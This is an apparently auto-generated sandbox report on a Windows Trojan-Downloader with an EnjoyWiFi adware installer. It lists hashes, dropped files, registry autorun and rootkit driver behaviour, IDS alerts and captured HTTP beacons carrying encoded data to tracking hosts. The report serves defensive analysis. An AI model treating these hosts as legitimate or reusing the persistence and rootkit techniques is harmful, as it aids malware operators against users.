Gen.Variant.Razy.150085_98e911dd01

by malwarelabrobot on October 10th, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.Adload.qajs (Kaspersky), Gen:Variant.Razy.150085 (B) (Emsisoft), Gen:Variant.Razy.150085 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 98e911dd016cd8140af8b956c4c3d772
SHA1: 8ea828233579f6d0a88a72143968af58c65c8cde
SHA256: c07120a8e5da5aa4e7630f808c1ab151c7a9d5b4a88a781ecbe706ba7ca5283d
SSDeep: 6144:42RdRrzUnUObUvlhOMKQeyziAbf/Ggog:xz/BlKQBziAbHL
Size: 320000 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-03 13:11:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

csc.exe:2736
csc.exe:1596
csc.exe:2384
setup.4.15.f.exe:1656
enjoyWIFI.exe:892
enjoyWIFI.exe:4004
enjoyWIFI.exe:3396
cvtres.exe:4000
cvtres.exe:576
cvtres.exe:1376
enjoyWIFI.tmp:1056
starter.exe:1084

The Trojan injects its code into the following process(es):

%original file name%.exe:644
enjoyWIFI.tmp:2584
Explorer.EXE:284

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process csc.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (4304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (0 bytes)

The process csc.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (2490 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (0 bytes)

The process csc.exe:2384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (3662 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (0 bytes)

The process setup.4.15.f.exe:1656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (23 bytes)
%Program Files%\EnjoyWiFi\inst.db (5 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
%Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
%Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
%Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (29506 bytes)
C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
%Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
%Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
%Program Files%\EnjoyWiFi\zlib.dll (925 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (0 bytes)
%Program Files%\EnjoyWiFi\x86 (0 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (0 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsnA2D3.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (0 bytes)

The process %original file name%.exe:644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe (185379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\513488b4c2f64a4a9f5a9d95e2668ace\enjoyWIFI.exe (202246 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (5572 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe (205485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (388 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (0 bytes)

The process enjoyWIFI.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (0 bytes)

The process enjoyWIFI.exe:4004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-RP795.tmp\enjoyWIFI.tmp (1832 bytes)

The process enjoyWIFI.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (1832 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp (0 bytes)

The process cvtres.exe:4000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (3666 bytes)

The process cvtres.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (3666 bytes)

The process cvtres.exe:1376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (3658 bytes)

The process enjoyWIFI.tmp:2584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_RegDLL.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\HelpTool.dll (8020 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_shfoldr.dll (47 bytes)

The process enjoyWIFI.tmp:1056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (8020 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (15262 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (0 bytes)

The process starter.exe:1084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rsl2960.tmp (1 bytes)

Registry activity

The process setup.4.15.f.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\upm]
"app" = "4B E8 E3 9B FD 1F 55 BF DE BA AF 90 5C B8 C7 EA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayIcon" = "%Program Files%\EnjoyWiFi\EnjoyWiFi.exe"
"InstallLocation" = "%Program Files%\EnjoyWiFi"
"UninstallString" = "%Program Files%\EnjoyWiFi\uninst.exe"

[HKLM\SOFTWARE\Microsoft\SystemSettings\Fetcher]
"01" = "E3 72 9B 4B 6C 70 5D 09 F5 23 83 45 5D 8F 8B C8"

[HKLM\System\CurrentControlSet\services\wfcre\Parameters]
"374335773" = "E6 74 6B 0B 6B CB 39 68 A7 72 AE 03 26 C2 2B 40"

[HKLM\System\CurrentControlSet\services\wfcre]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayName" = "EnjoyWiFi"

[HKLM\System\CurrentControlSet\services\wfcre]
"Start" = "1"

The process %original file name%.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"MaxFileSize" = "1048576"

To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"%original file name%.exe" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process enjoyWIFI.tmp:1056 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\enjoyWifi]
"TmN" = "51499"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\enjoyWifi\actv]
"(Default)" = ""

[HKCU\Software\enjoyWifi]
"TmSN" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process starter.exe:1084 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableConsoleTracing" = "0"

Dropped PE files

MD5 File path
764b1ff923126715e2b443a3a4c155f7 c:\Program Files\EnjoyWiFi\EnjoyWiFi.exe
6fa4163081ad4a38e405c169ea361ff1 c:\Program Files\EnjoyWiFi\uninst.exe
497648a5cbdd6baba950f93d3f5353fc c:\Program Files\EnjoyWiFi\wfcrecf.dll
68b4e74c33aaf425c9782f922eb927e9 c:\Program Files\EnjoyWiFi\wftinst.dll
c7d4d685a0af2a09cbc21cb474358595 c:\Program Files\EnjoyWiFi\zlib.dll
b1010a49c62837b6ca320600e9e2c784 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe
588001502c10b32dd0c16f200e4bdc7d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe
0c4eb503e6c1774acb6c5de66aa02d6c c:\Windows\System32\drivers\wfcre.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\wfcre.sys", the Trojan controls the loading of executable images into memory by installing a load-image notify routine.
Using the driver "%System%\drivers\wfcre.sys", the Trojan controls system registry operations by installing a registry notify routine.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 4.5.2.0
Legal Copyright:
Legal Trademarks:
Original Filename: kenpachi.exe
Internal Name: kenpachi.exe
File Version: 4.5.2.0
File Description:
Comments:
Language: Bulgarian (Bulgaria)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 210052 210432 4.92745 72ab14fda51f4f40052a0f5513525e86
.sdata 221184 744 1024 4.06311 6c8ee4f3664e76aa13f44adca1513bd0
.rsrc 229376 106916 107008 2.4096 69466494369f14e51d18fcfcf0912eb2
.reloc 344064 12 512 0.070639 d7113ebf74cab35b179666341c1fae44

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY External IP Lookup sina.com.cn
ET MALWARE Double User-Agent (User-Agent User-Agent)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:01 GMT
Connection: close
Content-Length: 0


POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive


HTTP/1.1 100 Continue


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Mon, 09 Oct 2017 10:13:39 GMT
Content-Encoding: gzip


GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev HTTP/1.1
Host: svc-stats.linkury.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
{"d":"50027"}


GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Mon, 09 Oct 2017 10:14:09 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
DPOOL_LB7_HEADER: skuld144


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1
Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
{"d":"OK"}



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue


HTTP/1.1 100 Continue
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1934
Expect: 100-continue


HTTP/1.1 100 Continue
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 2414
Expect: 100-continue


HTTP/1.1 100 Continue
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 3902
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024007218
1870850732312381921131201431440541961191072422381141360422281101760771
1900005802618204011820125504911616020113412310611802707602208216700102
1116153212015103131014099244080243019001113097015044149218013049044058
1290002242351550221071501900902240630590740131911181050051730152040770
6116207104813910616023312702204409202013122606617108003108721618602110
0142139144106038032112102173006194234042102242252210065031230088119169
1580741171870782170690030302380150370661020690801611772361751280841691
6407413810824300220719812607611123805907601224807706107607622413605011
5109096101047024006147252026057136150018109235237206254072019215156128
2521992180431410980511030351311110820631932370140810302430030022050230
7406420308905003119009022822723901716017318711508422508105103619103922
1191235162158135058068076210096047128025204223190124190156041161007054
0001050232200511211060441222351301511571480360841372420990362440892082
3111017508217020719704825212306913924116601212617810107006615218709008
6174241010123059148092143061195213113065123116053153207246229078155119
2031262232102491732360721291772311370780681921240481141851321031030610
6414119305220917905216722002613513701005709109818118623705125320710101
1142057119159107174241069032022035170104115137227080255076076013069238
128137248151229237043122152062130109156025083206083195003011247160

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1358
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024019151
1290412232011630680391640941910260260930272331191112541961482421262080
9912010022611407322909711019211910518122501603912217708500004304313717
9124105027145124152084024000188096028213194187209174167070156064218153
1460920530490161410500312131082141060541230711890752062331111792420671
3901601917112520503718608003214921323713119114600922701418615621220621
8231147067224133052065153047025207046012060124014167197067145059233136
0281081991380240150481221790561211001922392310312282032470631791710280
0623812311120700514108703316114911504500825109224707007415922419018806
2160170037121166075036042173212209106156084142118124039253109122094248
2161552532291521741850290791950151481851311230141572120820331160681740
5112213322903213512325108123121116017404721620006616819103005015306512
2159048211091004233220019242179021205184196064002238142124180212186232
2450260521440980730121972070240532002530520242460980681732091540490800
4812409609822116608314704711218513101812900722118203506025014409912303
5065058050136248057017039015007194019071195098251019141158174219078130
1170171250791721501522210052542340771201290230311701251011660610872150
88253209061064051246199078"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1406
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024016018
0670340950392060621031621381831201862462390940721560050280290090990642
0615000922901506120522001416603023011522315020117321417804609217505814
3148088233085068168032132089150242164211237160080047051072180126063119
1560421982202291041441681941422540821692060962551141810342091281772471
0224502815716301525400014617507305215914820119118810818013411725420508
9028230226174043031050105229115242075154134014077172157091242126047029
0750141111892551911120271740922171371771322461820601901002271942421640
0324917903223201212808201717019912025508220901905908204908620409505206
9094138200029086009203157065217026077051210222127052245008070245023091
1592121651601051132361222251370650380212200801421501802351651560501500
3407813106222705604311515810912514410202400304512224221304320511213205
0039240032012230089008136230072253036186086239080235235026166154054119
0750270870070031670891260121840530311030570930740431891152540880270921
9318807016310107403413317006919521903320800822408017705417417709712214
8018168178254008147197071097125151179027102221020198164144112160227234
0641710141951901540041201111691372492251242101810971941101142390000640
0923205320216615002016715402518806316015900623614604105322909914304102
2074"}


HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....



{"request":"0631462230990081771352540191321201192020260030102222210091
